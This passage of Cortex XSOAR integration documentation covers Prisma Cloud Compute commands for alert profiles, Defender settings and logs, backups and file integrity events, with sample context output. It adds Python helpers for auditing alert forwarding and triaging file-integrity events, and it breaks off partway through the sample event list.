| PrismaCloudCompute.AlertProfiles.Policy.AppEmbeddedRuntime.AllRules | Boolean | Whether the app-embedded runtime alert trigger applies to all rules. |
| PrismaCloudCompute.AlertProfiles.Policy.AppEmbeddedRuntime.Enabled | Boolean | Whether the app-embedded runtime alert trigger is enabled. |
| PrismaCloudCompute.AlertProfiles.Policy.CloudDiscovery.AllRules | Boolean | Whether the cloud discovery alert trigger applies to all rules. |
| PrismaCloudCompute.AlertProfiles.Policy.CloudDiscovery.Enabled | Boolean | Whether the cloud discovery alert trigger is enabled. |
| PrismaCloudCompute.AlertProfiles.Policy.CodeRepoVulnerability.AllRules | Boolean | Whether the code repository vulnerability alert trigger applies to all rules. |
| PrismaCloudCompute.AlertProfiles.Policy.CodeRepoVulnerability.Enabled | Boolean | Whether the code repository vulnerability alert trigger is enabled. |
| PrismaCloudCompute.AlertProfiles.Policy.ContainerAppFirewall.AllRules | Boolean | Whether the container app firewall alert trigger applies to all rules. |
| PrismaCloudCompute.AlertProfiles.Policy.ContainerAppFirewall.Enabled | Boolean | Whether the container app firewall alert trigger is enabled. |
| PrismaCloudCompute.AlertProfiles.Policy.ContainerCompliance.AllRules | Boolean | Whether the container compliance alert trigger applies to all rules. |
| PrismaCloudCompute.AlertProfiles.Policy.ContainerCompliance.Enabled | Boolean | Whether the container compliance alert trigger is enabled. |
| PrismaCloudCompute.AlertProfiles.Policy.ContainerComplianceScan.AllRules | Boolean | Whether the container compliance scan alert trigger applies to all rules. |
| PrismaCloudCompute.AlertProfiles.Policy.ContainerComplianceScan.Enabled | Boolean | Whether the container compliance scan alert trigger is enabled. |
| PrismaCloudCompute.AlertProfiles.Policy.ContainerRuntime.AllRules | Boolean | Whether the container runtime alert trigger applies to all rules. |
| PrismaCloudCompute.AlertProfiles.Policy.ContainerRuntime.Enabled | Boolean | Whether the container runtime alert trigger is enabled. |
| PrismaCloudCompute.AlertProfiles.Policy.ContainerVulnerability.AllRules | Boolean | Whether the container vulnerability alert trigger applies to all rules. |
| PrismaCloudCompute.AlertProfiles.Policy.ContainerVulnerability.Enabled | Boolean | Whether the container vulnerability alert trigger is enabled. |
| PrismaCloudCompute.AlertProfiles.Policy.Defender.AllRules | Boolean | Whether the Defender alert trigger applies to all rules. |
| PrismaCloudCompute.AlertProfiles.Policy.Defender.Enabled | Boolean | Whether the Defender alert trigger is enabled. |
| PrismaCloudCompute.AlertProfiles.Policy.Docker.AllRules | Boolean | Whether the Docker alert trigger applies to all rules. |
| PrismaCloudCompute.AlertProfiles.Policy.Docker.Enabled | Boolean | Whether the Docker alert trigger is enabled. |
| PrismaCloudCompute.AlertProfiles.Policy.HostAppFirewall.AllRules | Boolean | Whether the host app firewall alert trigger applies to all rules. |
| PrismaCloudCompute.AlertProfiles.Policy.HostAppFirewall.Enabled | Boolean | Whether the host app firewall alert trigger is enabled. |
| PrismaCloudCompute.AlertProfiles.Policy.HostCompliance.AllRules | Boolean | Whether the host compliance alert trigger applies to all rules. |
| PrismaCloudCompute.AlertProfiles.Policy.HostCompliance.Enabled | Boolean | Whether the host compliance alert trigger is enabled. |
| PrismaCloudCompute.AlertProfiles.Policy.HostComplianceScan.AllRules | Boolean | Whether the host compliance scan alert trigger applies to all rules. |
| PrismaCloudCompute.AlertProfiles.Policy.HostComplianceScan.Enabled | Boolean | Whether the host compliance scan alert trigger is enabled. |
| PrismaCloudCompute.AlertProfiles.Policy.HostRuntime.AllRules | Boolean | Whether the host runtime alert trigger applies to all rules. |
| PrismaCloudCompute.AlertProfiles.Policy.HostRuntime.Enabled | Boolean | Whether the host runtime alert trigger is enabled. |
| PrismaCloudCompute.AlertProfiles.Policy.HostVulnerability.AllRules | Boolean | Whether the host vulnerability alert trigger applies to all rules. |
| PrismaCloudCompute.AlertProfiles.Policy.HostVulnerability.Enabled | Boolean | Whether the host vulnerability alert trigger is enabled. |
| PrismaCloudCompute.AlertProfiles.Policy.Incident.AllRules | Boolean | Whether the incident alert trigger applies to all rules. |
| PrismaCloudCompute.AlertProfiles.Policy.Incident.Enabled | Boolean | Whether the incident alert trigger is enabled. |
| PrismaCloudCompute.AlertProfiles.Policy.KubernetesAudit.AllRules | Boolean | Whether the Kubernetes audit alert trigger applies to all rules. |
| PrismaCloudCompute.AlertProfiles.Policy.KubernetesAudit.Enabled | Boolean | Whether the Kubernetes audit alert trigger is enabled. |
PrismaCloudCompute.AlertProfiles.Policy.NetworkFirewall.AllRulesBooleanThe network firewall rules.
PrismaCloudCompute.AlertProfiles.Policy.NetworkFirewall.EnabledBooleanWhether the network firewall rule is enabled.
PrismaCloudCompute.AlertProfiles.Policy.RegistryVulnerability.AllRulesBooleanThe registry vulnerability rules.
PrismaCloudCompute.AlertProfiles.Policy.RegistryVulnerability.EnabledBooleanWhether the registry vulnerability rule is enabled.
PrismaCloudCompute.AlertProfiles.Policy.ServerlessAppFirewall.AllRulesBooleanThe servervless app firewall rules.
PrismaCloudCompute.AlertProfiles.Policy.ServerlessAppFirewall.EnabledBooleanWhether the serverless app firewall rule is enabled.
PrismaCloudCompute.AlertProfiles.Policy.ServerlessRuntime.AllRulesBooleanThe serverless runtime rules.
PrismaCloudCompute.AlertProfiles.Policy.ServerlessRuntime.EnabledBooleanWhether the serverless runtime rule is enabled.
PrismaCloudCompute.AlertProfiles.Policy.VmCompliance.AllRulesBooleanThe VM compliance rules.
PrismaCloudCompute.AlertProfiles.Policy.VmCompliance.EnabledBooleanWhether the VM compliance rule is enabled.
PrismaCloudCompute.AlertProfiles.Policy.VmVulnerability.AllRulesBooleanThe VM vulnerability rules.
PrismaCloudCompute.AlertProfiles.Policy.VmVulnerability.EnabledBooleanWhether the VM vulnerability rules are enabled.
PrismaCloudCompute.AlertProfiles.Policy.WaasHealth.AllRulesBooleanThe WAAS health rules.
PrismaCloudCompute.AlertProfiles.Policy.WaasHealth.EnabledBooleanWhether the WAAS health rules are enabled.
PrismaCloudCompute.AlertProfiles.PreviousNameStringThe alert profile previous name.
PrismaCloudCompute.AlertProfiles.SecurityAdvisor.CredentialIDStringThe security advisor credential ID.
PrismaCloudCompute.AlertProfiles.SecurityAdvisor.EnabledBooleanWhether the security advisor is enabled.
PrismaCloudCompute.AlertProfiles.SecurityAdvisor.FindingsURLStringThe security advisor findings URL.
PrismaCloudCompute.AlertProfiles.SecurityAdvisor.ProviderIdStringThe security advisor provider ID.
PrismaCloudCompute.AlertProfiles.SecurityAdvisor.TokenURLStringThe security advisor token URL.
PrismaCloudCompute.AlertProfiles.SecurityCenter.CredentialIdStringThe security center crendential ID.
PrismaCloudCompute.AlertProfiles.SecurityCenter.EnabledBooleanWhether the security center is enabled.
PrismaCloudCompute.AlertProfiles.SecurityCenter.SourceIDStringThe security center source ID.
PrismaCloudCompute.AlertProfiles.SecurityHub.AccountIDStringThe security hub account ID.
PrismaCloudCompute.AlertProfiles.SecurityHub.CredentialIdStringThe security hub credential ID.
PrismaCloudCompute.AlertProfiles.SecurityHub.EnabledBooleanWhether the security hub is enabled.
PrismaCloudCompute.AlertProfiles.SecurityHub.RegionStringThe security hub region.
PrismaCloudCompute.AlertProfiles.ServiceNow.ApplicationStringThe ServiceNow application.
PrismaCloudCompute.AlertProfiles.ServiceNow.AssigneeStringThe ServiceNow assignee.
PrismaCloudCompute.AlertProfiles.ServiceNow.CredentialIDStringThe ServiceNow credential ID.
PrismaCloudCompute.AlertProfiles.ServiceNow.ProjectStringThe ServiceNow project.
PrismaCloudCompute.AlertProfiles.Slack.EnabledBooleanWhether the Slack alert profile is enabled.
PrismaCloudCompute.AlertProfiles.Slack.WebhookUrlStringThe Slack URL.
PrismaCloudCompute.AlertProfiles.Splunk.AuthToken.EncryptedStringThe Splunk auth token.
PrismaCloudCompute.AlertProfiles.Splunk.SourceTypeStringThe Splunk source type.
PrismaCloudCompute.AlertProfiles.Splunk.UrlStringThe Splunk URL.
PrismaCloudCompute.AlertProfiles.VulnerabilityImmediateAlertsEnabledBooleanWhether the vulnerability alert is enabled.
PrismaCloudCompute.AlertProfiles.Webhook.CredentialIdStringThe webhook credential ID.
PrismaCloudCompute.AlertProfiles.Webhook.UrlStringThe webhook URL.
PrismaCloudCompute.AlertProfiles._IdStringThe alert profile ID.

Command example#

!prisma-cloud-compute-get-alert-profiles

Context Example#

```json
{
  "PrismaCloudCompute": {
    "AlertProfiles": {
      "Cortex": {
        "Application": "xsoar",
        "CredentialId": "",
        "Enabled": true,
        "Url": ""
      },
      "Email": {
        "CredentialId": "",
        "Enabled": false,
        "From": "",
        "Port": 0,
        "SmtpAddress": "",
        "Ssl": false
      },
      "GcpPubsub": {
        "CredentialId": "",
        "Enabled": false,
        "Topic": ""
      },
      "Jira": {
        "Assignee": {},
        "BaseUrl": "",
        "CaCert": "",
        "CredentialId": "",
        "Enabled": false,
        "IssueType": "",
        "Labels": {},
        "Priority": "",
        "ProjectKey": {}
      },
      "LastError": "",
      "Modified": "2023-04-03T18:43:05.575Z",
      "Name": "XSOAR",
      "Owner": "admin",
      "Pagerduty": {
        "RoutingKey": {
          "Encrypted": ""
        },
        "Severity": "",
        "Summary": ""
      },
      "Policy": {
        "Admission": {
          "AllRules": true,
          "Enabled": false,
          "Rules": []
        },
        "AgentlessAppFirewall": {
          "AllRules": true,
          "Enabled": true,
          "Rules": []
        },
        "AppEmbeddedAppFirewall": {
          "AllRules": true,
          "Enabled": true,
          "Rules": []
        },
        "AppEmbeddedRuntime": {
          "AllRules": true,
          "Enabled": false,
          "Rules": []
        },
        "CloudDiscovery": {
          "AllRules": true,
          "Enabled": false,
          "Rules": []
        },
        "CodeRepoVulnerability": {
          "AllRules": true,
          "Enabled": false,
          "Rules": []
        },
        "ContainerAppFirewall": {
          "AllRules": true,
          "Enabled": true,
          "Rules": []
        },
        "ContainerCompliance": {
          "AllRules": true,
          "Enabled": false,
          "Rules": []
        },
        "ContainerComplianceScan": {
          "AllRules": true,
          "Enabled": false,
          "Rules": []
        },
        "ContainerRuntime": {
          "AllRules": true,
          "Enabled": false,
          "Rules": []
        },
        "ContainerVulnerability": {
          "AllRules": true,
          "Enabled": false,
          "Rules": []
        },
        "Defender": {
          "AllRules": true,
          "Enabled": false,
          "Rules": []
        },
        "Docker": {
          "AllRules": true,
          "Enabled": false,
          "Rules": []
        },
        "HostAppFirewall": {
          "AllRules": true,
          "Enabled": true,
          "Rules": []
        },
        "HostCompliance": {
          "AllRules": true,
          "Enabled": false,
          "Rules": []
        },
        "HostComplianceScan": {
          "AllRules": true,
          "Enabled": false,
          "Rules": []
        },
        "HostRuntime": {
          "AllRules": true,
          "Enabled": false,
          "Rules": []
        },
        "HostVulnerability": {
          "AllRules": true,
          "Enabled": false,
          "Rules": []
        },
        "Incident": {
          "AllRules": true,
          "Enabled": false,
          "Rules": []
        },
        "KubernetesAudit": {
          "AllRules": true,
          "Enabled": false,
          "Rules": []
        },
        "NetworkFirewall": {
          "AllRules": true,
          "Enabled": false,
          "Rules": []
        },
        "RegistryVulnerability": {
          "AllRules": true,
          "Enabled": false,
          "Rules": []
        },
        "ServerlessAppFirewall": {
          "AllRules": true,
          "Enabled": true,
          "Rules": []
        },
        "ServerlessRuntime": {
          "AllRules": true,
          "Enabled": false,
          "Rules": []
        },
        "VmCompliance": {
          "AllRules": true,
          "Enabled": false,
          "Rules": []
        },
        "VmVulnerability": {
          "AllRules": true,
          "Enabled": false,
          "Rules": []
        },
        "WaasHealth": {
          "AllRules": true,
          "Enabled": true,
          "Rules": []
        }
      },
      "PreviousName": "",
      "SecurityAdvisor": {
        "CredentialID": "",
        "Enabled": false,
        "FindingsURL": "",
        "ProviderId": "",
        "TokenURL": ""
      },
      "SecurityCenter": {
        "CredentialId": "",
        "Enabled": false,
        "SourceID": ""
      },
      "SecurityHub": {
        "AccountID": "",
        "CredentialId": "",
        "Enabled": false,
        "Region": ""
      },
      "ServiceNow": {
        "Application": "",
        "Assignee": "",
        "CredentialID": "",
        "Project": ""
      },
      "Slack": {
        "Enabled": false,
        "WebhookUrl": ""
      },
      "Splunk": {
        "AuthToken": {
          "Encrypted": ""
        },
        "SourceType": "",
        "Url": ""
      },
      "Sqs": {},
      "VulnerabilityImmediateAlertsEnabled": false,
      "Webhook": {
        "CredentialId": "",
        "Url": ""
      },
      "_Id": "XSOAR"
    }
  }
}
```

Human Readable Output#

Alert Profiles#

| Policy | enabled | allRules | rules |
| --- | --- | --- | --- |
| admission | false | true | |
| agentlessAppFirewall | true | true | |
| appEmbeddedAppFirewall | true | true | |
| appEmbeddedRuntime | false | true | |
| cloudDiscovery | false | true | |
| codeRepoVulnerability | false | true | |
| containerAppFirewall | true | true | |
| containerCompliance | false | true | |
| containerComplianceScan | false | true | |
| containerRuntime | false | true | |
| containerVulnerability | false | true | |
| defender | false | true | |
| docker | false | true | |
| hostAppFirewall | true | true | |
| hostCompliance | false | true | |
| hostComplianceScan | false | true | |
| hostRuntime | false | true | |
| hostVulnerability | false | true | |
| incident | false | true | |
| kubernetesAudit | false | true | |
| networkFirewall | false | true | |
| registryVulnerability | false | true | |
| serverlessAppFirewall | true | true | |
| serverlessRuntime | false | true | |
| vmCompliance | false | true | |
| vmVulnerability | false | true | |
| waasHealth | true | true | |
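The profile above forwards only the firewall and WAAS health alert types; runtime, incident and Kubernetes audit alerts are switched off, so none of those would ever reach XSOAR even though the Cortex destination is enabled. The following is an added example, not code from the integration or the pack: it audits an alert profile in the `PrismaCloudCompute.AlertProfiles` context shape against a set of alert types the SOC expects to receive. The `REQUIRED_POLICIES` set and the sample profile (trimmed from the Context Example, with `HostRuntime` changed to a rule-scoped entry) are assumptions.

```python
"""Audit a Prisma Cloud Compute alert profile as returned in XSOAR context.

Added example, not part of the integration. Input shape mirrors the
PrismaCloudCompute.AlertProfiles context documented above; REQUIRED_POLICIES
is an assumption about which alert types a SOC wants forwarded.
"""
from __future__ import annotations

# Alert types a SOC typically wants forwarded to XSOAR (assumption, adjust to taste).
REQUIRED_POLICIES = frozenset({
    "Admission",
    "ContainerRuntime",
    "HostRuntime",
    "Incident",
    "KubernetesAudit",
})


def audit_alert_profile(profile: dict, required: frozenset = REQUIRED_POLICIES) -> dict:
    """Return which alert types the profile will and will not forward to XSOAR.

    Keys of the result:
      name           - profile name (falls back to _Id)
      cortex_enabled - True if the Cortex (XSOAR) destination is switched on
      enabled        - sorted policy types that forward alerts
      disabled       - sorted policy types that are switched off
      scoped         - (policy type, rule names) pairs limited to specific rules (AllRules false)
      missing        - required policy types that are disabled or absent
      ok             - True only if cortex_enabled and nothing is missing
    """
    policies = profile.get("Policy", {})
    enabled, disabled, scoped = [], [], []
    for name, cfg in sorted(policies.items()):
        if not cfg.get("Enabled", False):
            disabled.append(name)
            continue
        enabled.append(name)
        if not cfg.get("AllRules", False):
            scoped.append((name, list(cfg.get("Rules", []))))
    missing = sorted(r for r in required if r not in enabled)
    cortex_enabled = bool(profile.get("Cortex", {}).get("Enabled", False))
    return {
        "name": profile.get("Name") or profile.get("_Id", ""),
        "cortex_enabled": cortex_enabled,
        "enabled": enabled,
        "disabled": disabled,
        "scoped": scoped,
        "missing": missing,
        "ok": cortex_enabled and not missing,
    }


def format_audit(result: dict) -> str:
    """Render the audit as a short report, one line per finding."""
    lines = [f"Alert profile '{result['name']}': {'OK' if result['ok'] else 'ATTENTION'}"]
    if not result["cortex_enabled"]:
        lines.append("- Cortex destination is disabled: no alerts reach XSOAR")
    for name in result["missing"]:
        lines.append(f"- required alert type {name} is not forwarded")
    for name, rules in result["scoped"]:
        lines.append(f"- {name} is limited to rules {rules}")
    return "\n".join(lines)


# Constructed sample trimmed from the Context Example above (only the fields used);
# HostRuntime is deliberately changed to a rule-scoped entry to exercise that branch.
SAMPLE_PROFILE = {
    "_Id": "XSOAR",
    "Name": "XSOAR",
    "Cortex": {"Application": "xsoar", "Enabled": True},
    "Policy": {
        "Admission": {"AllRules": True, "Enabled": False, "Rules": []},
        "ContainerAppFirewall": {"AllRules": True, "Enabled": True, "Rules": []},
        "ContainerRuntime": {"AllRules": True, "Enabled": False, "Rules": []},
        "HostRuntime": {"AllRules": False, "Enabled": True,
                        "Rules": ["Default - alert on suspicious runtime behavior"]},
        "Incident": {"AllRules": True, "Enabled": False, "Rules": []},
        "KubernetesAudit": {"AllRules": True, "Enabled": False, "Rules": []},
        "WaasHealth": {"AllRules": True, "Enabled": True, "Rules": []},
    },
}

if __name__ == "__main__":
    print(format_audit(audit_alert_profile(SAMPLE_PROFILE)))
```

Run this against the output of `!prisma-cloud-compute-get-alert-profiles` (for example from an XSOAR automation that reads `PrismaCloudCompute.AlertProfiles` from context) after any change to the profile in the Console; a profile that is `Enabled` for the Cortex destination but has the interesting policy types switched off silently produces no incidents.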

prisma-cloud-compute-get-settings-defender#


Get the Defender settings.

Base Command#

prisma-cloud-compute-get-settings-defender

Input#

| Argument Name | Description | Required |
| --- | --- | --- |
| hostname | The Defender hostname. | Optional |

Context Output#

| Path | Type | Description |
| --- | --- | --- |
| PrismaCloudCompute.DefenderSettings.AdmissionControlEnabled | Boolean | Whether admission control is enabled. |
| PrismaCloudCompute.DefenderSettings.AdmissionControlWebhookSuffix | String | The admission control webhook suffix. |
| PrismaCloudCompute.DefenderSettings.AppEmbeddedFileSystemTracingEnabled | Boolean | Whether file system tracing is enabled for app-embedded Defenders. |
| PrismaCloudCompute.DefenderSettings.AutomaticUpgrade | Boolean | Whether Defenders are upgraded automatically. |
| PrismaCloudCompute.DefenderSettings.DisconnectPeriodDays | Number | The number of days after which a disconnected Defender is removed. |
| PrismaCloudCompute.DefenderSettings.HostCustomComplianceEnabled | Boolean | Whether custom host compliance checks are enabled. |
| PrismaCloudCompute.DefenderSettings.ListeningPort | Number | The Defender listening port. |

Command example#

!prisma-cloud-compute-get-settings-defender

Context Example#

```json
{
  "PrismaCloudCompute": {
    "DefenderSettings": {
      "AdmissionControlEnabled": false,
      "AdmissionControlWebhookSuffix": "sdgfskdjfbsdkfbsdkjfbsdkfbksdjbf",
      "AppEmbeddedFileSystemTracingEnabled": false,
      "AutomaticUpgrade": false,
      "DisconnectPeriodDays": 1,
      "HostCustomComplianceEnabled": false,
      "ListeningPort": 9998
    }
  }
}
```

Human Readable Output#

Results#

| AdmissionControlEnabled | AdmissionControlWebhookSuffix | AppEmbeddedFileSystemTracingEnabled | AutomaticUpgrade | DisconnectPeriodDays | HostCustomComplianceEnabled | ListeningPort |
| --- | --- | --- | --- | --- | --- | --- |
| false | sdgfskdjfbsdkfbsdkjfbsdkfbksdjbf | false | false | 1 | false | 9998 |

prisma-cloud-compute-logs-defender#


Retrieves the most recent log lines from a Defender and returns them to context.

Base Command#

prisma-cloud-compute-logs-defender

Input#

| Argument Name | Description | Required |
| --- | --- | --- |
| hostname | The Defender hostname. | Optional |
| lines | The number of log lines to fetch. Default is 10. | Optional |

Context Output#

| Path | Type | Description |
| --- | --- | --- |
| PrismaCloudCompute.Defenders.Hostname | String | The hostname the log was retrieved from. |
| PrismaCloudCompute.Defenders.Logs.Level | String | The log level. |
| PrismaCloudCompute.Defenders.Logs.Log | String | The log message. |
| PrismaCloudCompute.Defenders.Logs.Time | Date | The time of the log. |

Command example#

!prisma-cloud-compute-logs-defender hostname=test-host.internal lines=2

Context Example#

```json
{
  "PrismaCloudCompute": {
    "Defenders": {
      "Hostname": "test-host.internal",
      "Logs": [
        {
          "Level": "DEBUG",
          "Log": "defender.go:2042 Received upload logs message: &{DestLogs:defender_1681221297.tar.gz Lines:2}",
          "Time": "2023-04-11T13:54:57.862Z"
        },
        {
          "Level": "DEBUG",
          "Log": "ws.go:517 Received message with type uploadLogs",
          "Time": "2023-04-11T13:54:57.861Z"
        }
      ]
    }
  }
}
```

Human Readable Output#

Logs#

| level | log | time |
| --- | --- | --- |
| DEBUG | defender.go:2042 Received upload logs message: &{DestLogs:defender_1681221297.tar.gz Lines:2} | 2023-04-11T13:54:57.862Z |
| DEBUG | ws.go:517 Received message with type uploadLogs | 2023-04-11T13:54:57.861Z |

prisma-cloud-compute-logs-defender-download#


Downloads a gzip-compressed archive of the Defender logs and returns it as a file entry in the War Room.

Base Command#

prisma-cloud-compute-logs-defender-download

Input#

| Argument Name | Description | Required |
| --- | --- | --- |
| hostname | The Defender hostname. | Optional |
| lines | The number of log lines to fetch. Default is 100. | Optional |

Context Output#

| Path | Type | Description |
| --- | --- | --- |
| InfoFile.Name | String | The file name. |
| InfoFile.EntryID | String | The file entry ID. |
| InfoFile.Size | Number | The file size. |
| InfoFile.Type | String | The file type. |
| InfoFile.Info | String | Basic information about the file. |
| InfoFile.Extension | String | The file extension. |

Command example#

!prisma-cloud-compute-logs-defender-download hostname=`test-host.internal` lines=2

Context Example#

```json
{
  "InfoFile": {
    "EntryID": "355@d93bd179-ac81-4015-8ddc-c904349d83e0",
    "Extension": "gz",
    "Info": "application/gzip",
    "Name": "test-host.internal",
    "Size": 682469,
    "Type": "gzip compressed data"
  }
}
```

prisma-cloud-compute-get-backups#


Returns the available backups.

Base Command#

prisma-cloud-compute-get-backups

Input#

| Argument Name | Description | Required |
| --- | --- | --- |
| project | The project to retrieve the backups from. | Optional |

Context Output#

| Path | Type | Description |
| --- | --- | --- |
| PrismaCloudCompute.Backups.Id | String | The ID of the backup. |
| PrismaCloudCompute.Backups.Name | String | The name of the backup. |
| PrismaCloudCompute.Backups.Release | String | The Console release the backup was taken from. |
| PrismaCloudCompute.Backups.Time | Date | The time of the backup. |

Command example#

!prisma-cloud-compute-get-backups

Context Example#

```json
{
  "PrismaCloudCompute": {
    "Backups": [
      {
        "Id": "daily-22.12.585-1681184909.tar.gz",
        "Name": "daily",
        "Release": "22.12.585",
        "Time": "2023-04-11T03:48:29Z"
      },
      {
        "Id": "monthly-22.12.585-1679972425.tar.gz",
        "Name": "monthly",
        "Release": "22.12.585",
        "Time": "2023-03-28T03:00:25Z"
      },
      {
        "Id": "weekly-22.12.585-1681184909.tar.gz",
        "Name": "weekly",
        "Release": "22.12.585",
        "Time": "2023-04-11T03:48:29Z"
      }
    ]
  }
}
```

Human Readable Output#

Results#

| Id | Name | Release | Time |
| --- | --- | --- | --- |
| daily-22.12.585-1681184909.tar.gz | daily | 22.12.585 | 2023-04-11T03:48:29Z |
| monthly-22.12.585-1679972425.tar.gz | monthly | 22.12.585 | 2023-03-28T03:00:25Z |
| weekly-22.12.585-1681184909.tar.gz | weekly | 22.12.585 | 2023-04-11T03:48:29Z |

prisma-cloud-compute-get-file-integrity-events#


Returns runtime file integrity audit events for a host, or the details of a single event by its event ID.

Base Command#

prisma-cloud-compute-get-file-integrity-events

Input#

| Argument Name | Description | Required |
| --- | --- | --- |
| hostname | Hostname for which to get runtime file integrity audit events. Either event_id or hostname is required. | Optional |
| event_id | Event ID of the runtime file integrity audit event for which to get details. Either event_id or hostname is required. | Optional |
| limit | Limit on the number of events to return. Only relevant when filtering by hostname. Default is 10. | Optional |

Context Output#

| Path | Type | Description |
| --- | --- | --- |
| PrismaCloudCompute.FileIntegrity.Path | String | The absolute path of the file the event refers to. |
| PrismaCloudCompute.FileIntegrity.RuleName | String | The name of the runtime rule whose file integrity settings produced the event. |
| PrismaCloudCompute.FileIntegrity.AccountID | String | The cloud account ID. |
| PrismaCloudCompute.FileIntegrity.User | String | The user that initiated the event. |
| PrismaCloudCompute.FileIntegrity.Time | Date | The time of the event. |
| PrismaCloudCompute.FileIntegrity.Hostname | String | The hostname on which the event was found. |
| PrismaCloudCompute.FileIntegrity.EventType | String | The type of file integrity event. Possible values: metadata, read, write. |
| PrismaCloudCompute.FileIntegrity.Collections | Unknown | Collections to which this event applies. |
| PrismaCloudCompute.FileIntegrity.Fqdn | String | The current fully qualified domain name used in audit alerts. |
| PrismaCloudCompute.FileIntegrity.FileType | Number | The file type. |
| PrismaCloudCompute.FileIntegrity.ProcessName | String | The name of the process that initiated the event. |
| PrismaCloudCompute.FileIntegrity.Cluster | String | The cluster on which the event was found. |
| PrismaCloudCompute.FileIntegrity._Id | String | The event's unique identifier. |
| PrismaCloudCompute.FileIntegrity.Description | Unknown | A human-readable description of the action performed on the path. |

Command example#

!prisma-cloud-compute-get-file-integrity-events hostname=host123 limit=3

Context Example#

```json
{
  "PrismaCloudCompute": {
    "FileIntegrity": [
      {
        "AccountID": "123",
        "Cluster": "",
        "Collections": [
          "All",
          "123"
        ],
        "Description": "Process touch wrote to path (user: root)",
        "EventType": "write",
        "FileType": 2,
        "Fqdn": "",
        "Hostname": "host123",
        "Path": "/tmp/alert/test1",
        "ProcessName": "touch",
        "RuleName": "Default - alert on suspicious runtime behavior",
        "Time": "2023-08-30T01:16:01.037Z",
        "User": "root",
        "_Id": "64ee985138b8ac44a6f3d468"
      },
      {
        "AccountID": "123",
        "Cluster": "",
        "Collections": [
          "All",
          "123"
        ],
        "Description": "Process touch wrote to path (user: root)",
        "EventType": "write",
        "FileType": 2,
        "Fqdn": "",
        "Hostname": "host123",
        "Path": "/tmp/alert/test1",
        "ProcessName": "touch",
        "RuleName": "Default - alert on suspicious runtime behavior",
        "Time": "2023-08-30T00:16:01.883Z",
        "User": "root",
        "_Id": "64ee8a4138b8ac44a6f3d460"
      },
      {
        "AccountID": "123",
        "Cluster": "",
        "Collections": [
          "All",
          "123"
        ],
        "Description": "Process touch wrote to path (user: root)",
        "EventType": "write",
        "FileType": 2,
        "Fqdn": "",
        "Hostname": "host123",
        "Path": "/tmp/alert/test1",
        "ProcessName": "touch",
        "RuleName": "Default - alert on suspicious runtime behavior",
        "Time": "2023-08-29T23:16:01.673Z",
        "User": "root",
        "_Id": "64ee7c3138b8ac44a6f3d458"
      }
    ]
  }
}
```

Human Readable Output#

Results#

| AccountID | Cluster | Collections | Description | EventType | FileType | Fqdn | Hostname | Path | ProcessName | RuleName | Time | User | _Id |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| 123 | | All, 123 | Process touch wrote to path (user: root) | write | 2 | | host123 | /tmp/alert/test1 | touch | Default - alert on suspicious runtime behavior | 2023-08-30T01:16:01.037Z | root | 64ee985138b8ac44a6f3d468 |
| 123 | | All, 123 | Process touch wrote to path (user: root) | write | 2 | | host123 | /tmp/alert/test1 | touch | Default - alert on suspicious runtime behavior | 2023-08-30T00:16:01.883Z | root | 64ee8a4138b8ac44a6f3d460 |
| 123 | | All, 123 | Process touch wrote to path (user: root) | write | 2 | | host123 | /tmp/alert/test1 | touch | Default - alert on suspicious runtime behavior | 2023-08-29T23:16:01.673Z | root | 64ee7c3138b8ac44a6f3d458 |
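The three events above are the same write (`touch` on `/tmp/alert/test1` as root) repeating once an hour, which is what a cron job or health check looks like, and they carry the same rule name as a genuinely suspicious write to `/etc/sudoers` would. The following is an added example, not code from the integration or the pack: it takes `PrismaCloudCompute.FileIntegrity` entries, collapses repeats of the same host/path/process/user/type into one row with a count and a first/last-seen window, and rates each row by whether the path sits under a watched directory and whether the writing process is one expected to touch it. `WATCHED_PREFIXES`, `EXPECTED_WRITERS` and the two `/etc/` events in the sample are assumptions standing in for a site baseline; the other three sample events are copied from the Context Example.

```python
"""Triage runtime file integrity audit events (PrismaCloudCompute.FileIntegrity).

Added example, not part of the integration. WATCHED_PREFIXES and
EXPECTED_WRITERS stand in for a site baseline and are assumptions.
"""
from __future__ import annotations

from datetime import datetime

# Directories whose modification is always worth a look (assumption).
WATCHED_PREFIXES = ("/etc/", "/usr/bin/", "/usr/sbin/", "/root/.ssh/", "/var/spool/cron/")
# Processes expected to write under a watched prefix, e.g. package managers (assumption).
EXPECTED_WRITERS = {"/etc/": {"apt", "dpkg", "yum", "rpm"}}
SEVERITY_RANK = {"high": 0, "medium": 1, "low": 2}


def _parse_time(ts: str) -> datetime:
    """Parse the UTC timestamp the integration returns, e.g. 2023-08-30T01:16:01.037Z."""
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%fZ")


def classify(event: dict) -> str:
    """Rate one event: watched path changed by an unexpected process is high,
    a read of a watched path is medium, any other write is medium, the rest low."""
    path = event.get("Path", "")
    process = event.get("ProcessName", "")
    event_type = event.get("EventType", "")  # one of metadata, read, write
    for prefix in WATCHED_PREFIXES:
        if path.startswith(prefix):
            if process in EXPECTED_WRITERS.get(prefix, set()):
                return "low"
            return "high" if event_type in ("write", "metadata") else "medium"
    return "medium" if event_type == "write" else "low"


def aggregate_events(events: list[dict]) -> list[dict]:
    """Collapse repeats of the same (host, path, process, user, type) into one row
    with a count and first/last seen, sorted by severity and then by frequency."""
    groups: dict[tuple, dict] = {}
    for ev in events:
        key = (ev.get("Hostname"), ev.get("Path"), ev.get("ProcessName"),
               ev.get("User"), ev.get("EventType"))
        seen = _parse_time(ev["Time"])
        group = groups.get(key)
        if group is None:
            group = groups[key] = {
                "hostname": key[0], "path": key[1], "process": key[2], "user": key[3],
                "event_type": key[4], "rule": ev.get("RuleName", ""),
                "severity": classify(ev), "count": 0,
                "first_seen": seen, "last_seen": seen, "event_ids": [],
            }
        group["count"] += 1
        group["first_seen"] = min(group["first_seen"], seen)
        group["last_seen"] = max(group["last_seen"], seen)
        group["event_ids"].append(ev.get("_Id"))
    return sorted(groups.values(), key=lambda g: (SEVERITY_RANK[g["severity"]], -g["count"]))


RULE = "Default - alert on suspicious runtime behavior"
SAMPLE_EVENTS = [
    # Three hourly events copied from the Context Example above (fields used here only).
    {"_Id": "64ee985138b8ac44a6f3d468", "Hostname": "host123", "Path": "/tmp/alert/test1",
     "ProcessName": "touch", "User": "root", "EventType": "write",
     "Time": "2023-08-30T01:16:01.037Z", "RuleName": RULE},
    {"_Id": "64ee8a4138b8ac44a6f3d460", "Hostname": "host123", "Path": "/tmp/alert/test1",
     "ProcessName": "touch", "User": "root", "EventType": "write",
     "Time": "2023-08-30T00:16:01.883Z", "RuleName": RULE},
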